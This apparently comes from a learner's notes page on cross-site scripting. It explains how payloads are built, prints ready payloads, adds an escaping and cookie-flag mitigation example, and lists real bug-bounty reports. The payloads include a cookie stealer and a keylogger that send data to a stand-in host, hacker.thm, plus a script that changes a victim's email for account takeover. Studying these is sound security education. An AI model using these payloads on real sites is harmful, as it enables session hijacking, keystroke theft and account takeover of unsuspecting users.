
XSS


Last updated 2 years ago

Since XSS is based on JavaScript, it helps to have a basic understanding of the language and of how client-server requests and responses work

XSS is classified as an injection attack where malicious JavaScript gets injected into a web application with the intention of being executed by other users

Payload

  • There are two parts to the payload, the intention and the modification

The intention is what you wish the JavaScript to actually do

The modification is the set of changes made to that JavaScript so it actually executes in the context where it is injected, since every scenario is different

Simple Payload

  • This is the most common payload used on websites to test whether an XSS vulnerability is present or not!

<script>alert('XSS');</script>

Session stealing

  • Details of a user's session, such as login tokens, are often kept in cookies on the target's machine

<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>

This JavaScript takes the victim's cookie, base64-encodes it to ensure successful transmission and then sends it to a website under the hacker's control. Once the hacker has these cookies, they can take over the target's session and be logged in as that victim user

Keylogger

  • Anything the victim types on the webpage will be forwarded to a website under the hacker's control. This could be very damaging if the website the payload was installed on accepts user logins or credit card details

<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>

Business Logic

  • This would be calling a particular network resource or a JavaScript function

  • For example, imagine a JavaScript function for changing the user's email address called user.changeEmail() - the payload would look something like this

<script>user.changeEmail('attacker@hacker.thm');</script>

Impact => Now that the email address for the account has been changed, the attacker may perform a password reset attack to take over the account
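The simple payload and the session-stealing payload above only work because user input reaches the page as live markup and because the session cookie is readable from document.cookie. The following is an added example, not code from the original page: a vulnerable renderer next to an output-encoded one, run against the page's own test payload, plus a small check for the cookie flags that blunt the session-stealing payload (the header value and the helper names are constructed for this example).

```javascript
// Added example (not from the original page): vulnerable rendering beside
// the hardened form, plus a Set-Cookie flag check for session cookies.

// Constructed sample: the page's own test payload arriving as user input.
const USER_INPUT = "<script>alert('XSS');</script>";

// Vulnerable: user input is concatenated straight into markup, so a
// <script> tag in the input becomes part of the document and executes.
function renderUnsafe(comment) {
  return '<div class="comment">' + comment + "</div>";
}

// Mitigation: encode the five characters that can change HTML context.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: the same rendering, but user input is encoded first, so the
// browser shows the payload as inert text instead of running it.
function renderSafe(comment) {
  return '<div class="comment">' + escapeHtml(comment) + "</div>";
}

// True if the produced markup still carries an executable script tag.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The session-stealing payload reads document.cookie. A cookie set with
// HttpOnly is not exposed there, and Secure keeps it off plaintext links,
// so a session cookie missing either flag is a finding worth reporting.
// Assumes the "name=value; Attr; Attr=val" layout of a Set-Cookie header.
function missingSessionCookieFlags(setCookieHeader) {
  const attrs = setCookieHeader.split(";").slice(1).map((a) => a.trim().toLowerCase());
  const missing = [];
  if (!attrs.includes("httponly")) missing.push("HttpOnly");
  if (!attrs.includes("secure")) missing.push("Secure");
  return missing;
}

console.log(renderUnsafe(USER_INPUT)); // script tag survives
console.log(renderSafe(USER_INPUT));   // rendered as harmless text
console.log(missingSessionCookieFlags("session=abc123; Path=/")); // [ 'HttpOnly', 'Secure' ]
```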

Real-world XSS reports

  • XSS found in Shopify
  • $7,500 for XSS found in Steam chat
  • $2,500 for XSS in HackerOne
  • XSS found in Infogram